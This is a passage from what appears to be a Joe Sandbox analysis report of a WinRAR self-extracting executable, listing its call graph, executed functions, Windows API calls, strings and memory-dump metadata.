27ab1a 8 API calls 24784 278bd1 24782->24784 24788 27ab1a 8 API calls 24784->24788 24786->24774 25077 277db2 101 API calls 24786->25077 24806 278be7 24788->24806 24791 278b70 25083 276e98 77 API calls 24791->25083 24793->24782 24794 278cbc 24795 278e40 24794->24795 24796 278d18 24794->24796 24799 278e66 24795->24799 24800 278e52 24795->24800 24819 278d49 24795->24819 24797 278d8a 24796->24797 24798 278d28 24796->24798 24807 278167 19 API calls 24797->24807 24801 278d6e 24798->24801 24810 278d37 24798->24810 24803 283377 75 API calls 24799->24803 24802 279215 123 API calls 24800->24802 24801->24819 25086 2777b8 111 API calls 24801->25086 24802->24819 24804 278e7f 24803->24804 24808 283020 123 API calls 24804->24808 24805 278c93 24805->24794 25084 279a3c 82 API calls 24805->25084 24806->24794 24806->24805 24813 27981a 79 API calls 24806->24813 24811 278dbd 24807->24811 24808->24819 25085 272021 74 API calls 24810->25085 24815 278de6 24811->24815 24816 278df5 24811->24816 24811->24819 24813->24805 25087 277542 85 API calls 24815->25087 25088 279155 93 API calls __EH_prolog 24816->25088 24824 278f85 24819->24824 25089 272021 74 API calls 24819->25089 24821 279090 24821->24772 24823 27a4ed 3 API calls 24821->24823 24822 27903e 25065 279da2 24822->25065 24825 2790eb 24823->24825 24824->24772 24824->24821 24824->24822 25064 279f09 SetEndOfFile 24824->25064 24825->24772 25090 272021 74 API calls 24825->25090 24828 279085 24830 279620 77 API calls 24828->24830 24830->24821 24831 2790fb 25091 276dcb 76 API calls _wcschr 24831->25091 24834 2716a4 24833->24834 25107 27cee1 86 API calls 24834->25107 24838 279f59 24837->24838 24839 279f63 24838->24839 25108 276d0c 78 API calls 24838->25108 24839->24672 24841->24678 24842->24682 24844 27b50f __EH_prolog 24843->24844 24849 27f1d0 82 API calls 24844->24849 24846 27b521 24850 27b61e 24846->24850 24849->24846 24851 27b630 _abort 24850->24851 24854 2810dc 24851->24854 24857 28109e GetCurrentProcess GetProcessAffinityMask 24854->24857 24858 27b597 24857->24858 24858->24704 24864 271732 24859->24864 24861 2713d6 24861->24723 24862->24721 24863->24717 24865 271748 24864->24865 24876 2717a0 __InternalCxxFrameHandler 24864->24876 24866 271771 24865->24866 24877 276c36 76 API calls __vswprintf_c_l 24865->24877 24867 2717c7 24866->24867 24873 27178d ___std_exception_copy 24866->24873 24870 293e3e 22 API calls 24867->24870 24869 271767 24878 276ca7 75 API calls 24869->24878 24872 2717ce 24870->24872 24872->24876 24880 276ca7 75 API calls 24872->24880 24873->24876 24879 276ca7 75 API calls 24873->24879 24876->24861 24877->24869 24878->24866 24879->24876 24880->24876 24882 27cf4d 24881->24882 24884 27cf54 24881->24884 24886 27981a 24882->24886 24884->24726 24885->24728 24887 279833 24886->24887 24889 279e80 79 API calls 24887->24889 24888 279865 24888->24884 24889->24888 24891 2719bf 24890->24891 24893 2719bb 24890->24893 24894 2718f6 24891->24894 24893->24732 24895 271908 24894->24895 24896 271945 24894->24896 24897 273b2d 101 API calls 24895->24897 24902 273fa3 24896->24902 24900 271928 24897->24900 24900->24893 24904 273fac 24902->24904 24903 273b2d 101 API calls 24903->24904 24904->24903 24906 271966 24904->24906 24919 280e08 24904->24919 24906->24900 24907 271e50 24906->24907 24908 271e5a __EH_prolog 24907->24908 24927 273bba 24908->24927 24910 271e84 24911 271732 78 API calls 24910->24911 24913 271f0b 24910->24913 24912 271e9b 24911->24912 24955 2718a9 78 API calls 24912->24955 24913->24900 24915 271eb3 24917 271ebf _wcslen 24915->24917 24956 281b84 MultiByteToWideChar 24915->24956 24957 2718a9 78 API calls 24917->24957 24920 280e0f 24919->24920 24921 280e2a 24920->24921 24925 276c31 RaiseException _com_raise_error 24920->24925 24923 280e3b SetThreadExecutionState 24921->24923 24926 276c31 RaiseException _com_raise_error 24921->24926 24923->24904 24925->24921 24926->24923 24928 273bc4 __EH_prolog 24927->24928 24929 273bf6 24928->24929 24930 273bda 24928->24930 24931 273e51 24929->24931 24935 273c22 24929->24935 24983 27138b 74 API calls 24930->24983 25008 27138b 74 API calls 24931->25008 24934 273be5 24934->24910 24935->24934 24958 283377 24935->24958 24937 273ca3 24938 273d2e 24937->24938 24954 273c9a 24937->24954 24986 27d051 24937->24986 24968 27ab1a 24938->24968 24939 273c9f 24939->24937 24985 2720bd 78 API calls 24939->24985 24940 273c71 24940->24937 24940->24939 24941 273c8f 24940->24941 24984 27138b 74 API calls 24941->24984 24943 273d41 24948 273dd7 24943->24948 24949 273dc7 24943->24949 24992 283020 24948->24992 24972 279215 24949->24972 24952 273dd5 24952->24954 25001 272021 74 API calls 24952->25001 25002 282297 24954->25002 24955->24915 24956->24917 24957->24913 24959 28338c 24958->24959 24962 283396 ___std_exception_copy 24958->24962 25009 276ca7 75 API calls 24959->25009 24961 2834c6 25011 29238d RaiseException 24961->25011 24962->24961 24963 28341c 24962->24963 24967 283440 _abort 24962->24967 25010 2832aa 75 API calls 3 library calls 24963->25010 24966 2834f2 24967->24940 24969 27ab28 24968->24969 24971 27ab32 24968->24971 24970 28eb38 8 API calls 24969->24970 24970->24971 24971->24943 24973 27921f __EH_prolog 24972->24973 25012 277c64 24973->25012 24976 2713ba 78 API calls 24977 279231 24976->24977 25015 27d114 24977->25015 24979 27928a 24979->24952 24981 27d114 118 API calls 24982 279243 24981->24982 24982->24979 24982->24981 25024 27d300 97 API calls __InternalCxxFrameHandler 24982->25024 24983->24934 24984->24954 24985->24937 24987 27d084 24986->24987 24988 27d072 24986->24988 25026 27603a 82 API calls 24987->25026 25025 27603a 82 API calls 24988->25025 24991 27d07c 24991->24938 24993 283052 24992->24993 24995 283029 24992->24995 24994 283046 24993->24994 25041 28552f 123 API calls 2 library calls 24993->25041 24994->24952 24995->24994 24997 283048 24995->24997 24998 28303e 24995->24998 25040 28624a 118 API calls 24997->25040 25027 286cdc 24998->25027 25001->24954 25003 2822a1 25002->25003 25004 2822ba 25003->25004 25007 2822ce 25003->25007 25042 280eed 86 API calls 25004->25042 25006 2822c1 25006->25007 25008->24934 25009->24962 25010->24967 25011->24966 25013 27b146 GetVersionExW 25012->25013 25014 277c69 25013->25014 25014->24976 25020 27d12a __InternalCxxFrameHandler 25015->25020 25016 27d29a 25017 27d2ce 25016->25017 25018 27d0cb 6 API calls 25016->25018 25019 280e08 SetThreadExecutionState RaiseException 25017->25019 25018->25017 25022 27d291 25019->25022 25020->25016 25021 288c8d 103 API calls 25020->25021 25020->25022 25023 27ac05 91 API calls 25020->25023 25021->25020 25022->24982 25023->25020 25024->24982 25025->24991 25026->24991 25028 28359e 75 API calls 25027->25028 25033 286ced __InternalCxxFrameHandler 25028->25033 25029 27d114 118 API calls 25029->25033 25030 2870fe 25031 285202 98 API calls 25030->25031 25032 28710e __InternalCxxFrameHandler 25031->25032 25032->24994 25033->25029 25033->25030 25034 2811cf 81 API calls 25033->25034 25035 283e0b 118 API calls 25033->25035 25036 287153 118 API calls 25033->25036 25037 280f86 88 API calls 25033->25037 25038 28390d 98 API calls 25033->25038 25039 2877ef 123 API calls 25033->25039 25034->25033 25035->25033 25036->25033 25037->25033 25038->25033 25039->25033 25040->24994 25041->24994 25042->25006 25043->24742 25044->24742 25045->24739 25047 275d2a 25046->25047 25092 275c4b 25047->25092 25050 275d5d 25051 275d95 25050->25051 25097 27b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25050->25097 25051->24756 25053 278186 25052->25053 25054 278232 25053->25054 25104 27be5e 19 API calls __InternalCxxFrameHandler 25053->25104 25103 281fac CharUpperW 25054->25103 25057 27823b 25057->24759 25059 277c22 25058->25059 25060 277c5a 25059->25060 25105 276e7a 74 API calls 25059->25105 25060->24770 25062 277c52 25106 27138b 74 API calls 25062->25106 25064->24822 25066 279db3 25065->25066 25068 279dc2 25065->25068 25067 279db9 FlushFileBuffers 25066->25067 25066->25068 25067->25068 25069 279e3f SetFileTime 25068->25069 25069->24828 25070->24751 25071->24764 25072->24764 25073->24770 25074->24770 25075->24767 25076->24779 25077->24774 25078->24779 25080 2798c5 GetFileType 25079->25080 25081 278b5a 25079->25081 25080->25081 25081->24793 25082 272021 74 API calls 25081->25082 25082->24791 25083->24793 25084->24794 25085->24819 25086->24819 25087->24819 25088->24819 25089->24824 25090->24831 25091->24772 25098 275b48 25092->25098 25094 275c6c 25094->25050 25096 275b48 2 API calls 25096->25094 25097->25050 25101 275b52 25098->25101 25099 275c3a 25099->25094 25099->25096 25101->25099 25102 27b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25101->25102 25102->25101 25103->25057 25104->25054 25105->25062 25106->25060 25108->24839 25110 27a6a8 25109->25110 25111 27a727 FindNextFileW 25110->25111 25112 27a6c1 FindFirstFileW 25110->25112 25113 27a732 GetLastError 25111->25113 25119 27a709 25111->25119 25114 27a6d0 25112->25114 25112->25119 25113->25119 25115 27bb03 GetCurrentDirectoryW 25114->25115 25116 27a6e0 25115->25116 25117 27a6e4 FindFirstFileW 25116->25117 25118 27a6fe GetLastError 25116->25118 25117->25118 25117->25119 25118->25119 25119->24694 25120->24498 25121->24504 25122->24504 25123->24507 25124->24515 25126 279f42 78 API calls 25125->25126 25127 271fe8 25126->25127 25128 271a04 101 API calls 25127->25128 25131 272005 25127->25131 25129 271ff5 25128->25129 25129->25131 25132 27138b 74 API calls 25129->25132 25131->24523 25131->24524 25132->25131 25134 28b5bc GetDlgItem 25133->25134 25135 28b583 GetMessageW 25133->25135 25134->24534 25134->24535 25136 28b5a8 TranslateMessage DispatchMessageW 25135->25136 25137 28b599 IsDialogMessageW 25135->25137 25136->25134 25137->25134 25137->25136 25316 2894e0 GetClientRect 25342 2821e0 26 API calls std::bad_exception::bad_exception 25357 28f2e0 46 API calls __RTC_Initialize 25358 29bee0 GetCommandLineA GetCommandLineW 25139 28eae7 25140 28eaf1 25139->25140 25141 28e85d ___delayLoadHelper2@8 14 API calls 25140->25141 25142 28eafe 25141->25142 25317 28f4e7 29 API calls _abort 25343 27f1e8 FreeLibrary 25319 292cfb 38 API calls 4 library calls 25344 2795f0 80 API calls 25359 275ef0 82 API calls 25151 2998f0 25159 29adaf 25151->25159 25154 299904 25156 29990c 25157 299919 25156->25157 25167 299920 11 API calls 25156->25167 25160 29ac98 _unexpected 5 API calls 25159->25160 25161 29add6 25160->25161 25162 29adee TlsAlloc 25161->25162 25163 29addf 25161->25163 25162->25163 25164 28fbbc CatchGuardHandler 5 API calls 25163->25164 25165 2998fa 25164->25165 25165->25154 25166 299869 20 API calls 2 library calls 25165->25166 25166->25156 25167->25154 25168 29abf0 25169 29abfb 25168->25169 25170 29af0a 11 API calls 25169->25170 25171 29ac24 25169->25171 25173 29ac20 25169->25173 25170->25169 25174 29ac50 DeleteCriticalSection 25171->25174 25174->25173 25320 2988f0 7 API calls ___scrt_uninitialize_crt 25346 28fd4f 9 API calls 2 library calls 25360 2862ca 123 API calls __InternalCxxFrameHandler 25347 28b5c0 100 API calls 25383 2877c0 118 API calls 25384 28ffc0 RaiseException _com_raise_error _com_error::_com_error 25195 28dec2 25196 28decf 25195->25196 25197 27e617 53 API calls 25196->25197 25198 28dedc 25197->25198 25199 274092 _swprintf 51 API calls 25198->25199 25200 28def1 SetDlgItemTextW 25199->25200 25201 28b568 5 API calls 25200->25201 25202 28df0e 25201->25202 25266 2710d5 25271 275abd 25266->25271 25272 275ac7 __EH_prolog 25271->25272 25273 27b505 84 API calls 25272->25273 25274 275ad3 25273->25274 25278 275cac GetCurrentProcess GetProcessAffinityMask 25274->25278 25362 290ada 51 API calls 2 library calls 25282 28e1d1 14 API calls ___delayLoadHelper2@8 25385 29a3d0 21 API calls 2 library calls 25386 2a2bd0 VariantClear 25322 28f4d3 20 API calls 25284 28e2d7 25285 28e1db 25284->25285 25286 28e85d ___delayLoadHelper2@8 14 API calls 25285->25286 25286->25285

                                                                                  Executed Functions

                                                                                  Function 0028DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00280863: GetModuleHandleW.KERNEL32(kernel32), ref: 0028087C
                                                                                    • Part of subcall function 00280863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0028088E
                                                                                    • Part of subcall function 00280863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002808BF
                                                                                    • Part of subcall function 0028A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0028A655
                                                                                    • Part of subcall function 0028AC16: OleInitialize.OLE32(00000000), ref: 0028AC2F
                                                                                    • Part of subcall function 0028AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028AC66
                                                                                    • Part of subcall function 0028AC16: SHGetMalloc.SHELL32(002B8438), ref: 0028AC70
                                                                                  • GetCommandLineW.KERNEL32 ref: 0028DF5C
                                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0028DF83
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0028DF94
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0028DFCE
                                                                                    • Part of subcall function 0028DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028DBF4
                                                                                    • Part of subcall function 0028DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028DC30
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0028DFD7
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,002CEC90,00000800), ref: 0028DFF2
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,002CEC90), ref: 0028DFFE
                                                                                  • GetLocalTime.KERNEL32(?), ref: 0028E009
                                                                                  • _swprintf.LIBCMT ref: 0028E048
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0028E05A
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0028E061
                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 0028E078
                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0028E0C9
                                                                                  • Sleep.KERNEL32(?), ref: 0028E0F7
                                                                                  • DeleteObject.GDI32 ref: 0028E130
                                                                                  • DeleteObject.GDI32(?), ref: 0028E140
                                                                                  • CloseHandle.KERNEL32 ref: 0028E183
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz,
                                                                                  • API String ID: 3049964643-1721236633
                                                                                  • Opcode ID: 435447d7ece7f0af81db1c5d5e0d8e87623a41bb5c8b565e76f424a492f5ad31
                                                                                  • Instruction ID: 4ae34ebee2e680d49fb812e368a3a2f262be829a787d9c3ec86d70d7ee1e084b
                                                                                  • Opcode Fuzzy Hash: 435447d7ece7f0af81db1c5d5e0d8e87623a41bb5c8b565e76f424a492f5ad31
                                                                                  • Instruction Fuzzy Hash: 5E61EF75925205ABD720BF74FC4DF2B77ACAB46704F04042AF909921E2DF749D68CB62
                                                                                  Function 0028A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 802 28a6c2-28a6df FindResourceW 803 28a7db 802->803 804 28a6e5-28a6f6 SizeofResource 802->804 806 28a7dd-28a7e1 803->806 804->803 805 28a6fc-28a70b LoadResource 804->805 805->803 807 28a711-28a71c LockResource 805->807 807->803 808 28a722-28a737 GlobalAlloc 807->808 809 28a73d-28a746 GlobalLock 808->809 810 28a7d3-28a7d9 808->810 811 28a7cc-28a7cd GlobalFree 809->811 812 28a74c-28a76a call 290320 809->812 810->806 811->810 816 28a76c-28a78e call 28a626 812->816 817 28a7c5-28a7c6 GlobalUnlock 812->817 816->817 822 28a790-28a798 816->822 817->811 823 28a79a-28a7ae GdipCreateHBITMAPFromBitmap 822->823 824 28a7b3-28a7c1 822->824 823->824 825 28a7b0 823->825 824->817 825->824
                                                                                  APIs
                                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0028B73D,00000066), ref: 0028A6D5
                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A6EC
                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A703
                                                                                  • LockResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A712
                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0028B73D,00000066), ref: 0028A72D
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0028A73E
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028A762
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0028A7C6
                                                                                    • Part of subcall function 0028A626: GdipAlloc.GDIPLUS(00000010), ref: 0028A62C
                                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028A7A7
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0028A7CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                  • String ID: Fjun($PNG
                                                                                  • API String ID: 211097158-1265109434
                                                                                  • Opcode ID: 5c061124ab28b602cb79ae2b28fb227a386bf7cf73c0727806ff6408e05a7067
                                                                                  • Instruction ID: f416bca129d65598f7ec7ec6207699de9aebc73d1fa134a2099c2ba5c623678b
                                                                                  • Opcode Fuzzy Hash: 5c061124ab28b602cb79ae2b28fb227a386bf7cf73c0727806ff6408e05a7067
                                                                                  • Instruction Fuzzy Hash: 2E318479611302AFE710AF61EC4CD2BFBB9FF85750B14052AF905822A0EF31DD659B91
                                                                                  Function 0027A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1032 27a69b-27a6bf call 28ec50 1035 27a727-27a730 FindNextFileW 1032->1035 1036 27a6c1-27a6ce FindFirstFileW 1032->1036 1037 27a742-27a7ff call 280602 call 27c310 call 2815da * 3 1035->1037 1038 27a732-27a740 GetLastError 1035->1038 1036->1037 1039 27a6d0-27a6e2 call 27bb03 1036->1039 1043 27a804-27a811 1037->1043 1040 27a719-27a722 1038->1040 1047 27a6e4-27a6fc FindFirstFileW 1039->1047 1048 27a6fe-27a707 GetLastError 1039->1048 1040->1043 1047->1037 1047->1048 1050 27a717 1048->1050 1051 27a709-27a70c 1048->1051 1050->1040 1051->1050 1053 27a70e-27a711 1051->1053 1053->1050 1055 27a713-27a715 1053->1055 1055->1040
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6C4
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6F2
                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6FE
                                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A728
                                                                                  • GetLastError.KERNEL32(?,?,?,?,0027A592,000000FF,?,?), ref: 0027A734
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 42610566-0
                                                                                  • Opcode ID: ef5d01be2b89f185642678dd276335279d37c23af9759ce7e21be5c8901821d2
                                                                                  • Instruction ID: 6e13eef37a53d48695453751aea1b5467610540cde70970322a735b77cf5dab8
                                                                                  • Opcode Fuzzy Hash: ef5d01be2b89f185642678dd276335279d37c23af9759ce7e21be5c8901821d2
                                                                                  • Instruction Fuzzy Hash: B1417C76910515ABCB25DF64CC88AEEF7B8BB89350F104196F95DE3240D7346EA4CF90
                                                                                  Function 00297DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002,00000000), ref: 00297E0F
                                                                                  • TerminateProcess.KERNEL32(00000000,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002,00000000), ref: 00297E16
                                                                                  • ExitProcess.KERNEL32 ref: 00297E28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 35d283e64b1211114f11e68a5ecf0bca65030127c410b7182118c9715798ea24
                                                                                  • Instruction ID: 6d7076bfe99b81307df46f0a0373c662a94f85579a789a677559123e0392be17
                                                                                  • Opcode Fuzzy Hash: 35d283e64b1211114f11e68a5ecf0bca65030127c410b7182118c9715798ea24
                                                                                  • Instruction Fuzzy Hash: 07E0B631024148AFCF16AF64ED4EA5A7F6AEB51341F004454F9598A132CF36DE62CA90
                                                                                  Function 0027848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 853d4dbbece4e12f4eb4f769869045622c600724596ab2e08e71b31844df60dd
                                                                                  • Instruction ID: 0d7066d80da4aaeba4038ff938bd08003fa3bc05847df96f770cbff51e95b5f6
                                                                                  • Opcode Fuzzy Hash: 853d4dbbece4e12f4eb4f769869045622c600724596ab2e08e71b31844df60dd
                                                                                  • Instruction Fuzzy Hash: 49824070964246AEDF15DF74C899BFAB7B9BF05300F08C1B9E84D9B142DB305AA4CB61
                                                                                  Function 00286CDC Relevance: .3, Instructions: 343COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 51c87229d09a1678dfe32aa0d0efcbdd53047c6c6e91e4574f117eebd6d6e082
                                                                                  • Instruction ID: 0b3683c0863a5c79ec672c0299bbd05098798df5123ffd03a433fb163eaf8fd6
                                                                                  • Opcode Fuzzy Hash: 51c87229d09a1678dfe32aa0d0efcbdd53047c6c6e91e4574f117eebd6d6e082
                                                                                  • Instruction Fuzzy Hash: EDD127756193818FDB10EF28C88475BBBE1BF89308F08456DF8899B782D774E924CB56
                                                                                  Function 0028B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0028B7E5
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028B8D1
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B8EF
                                                                                  • IsDialogMessageW.USER32(?,?), ref: 0028B902
                                                                                  • TranslateMessage.USER32(?), ref: 0028B910
                                                                                  • DispatchMessageW.USER32(?), ref: 0028B91A
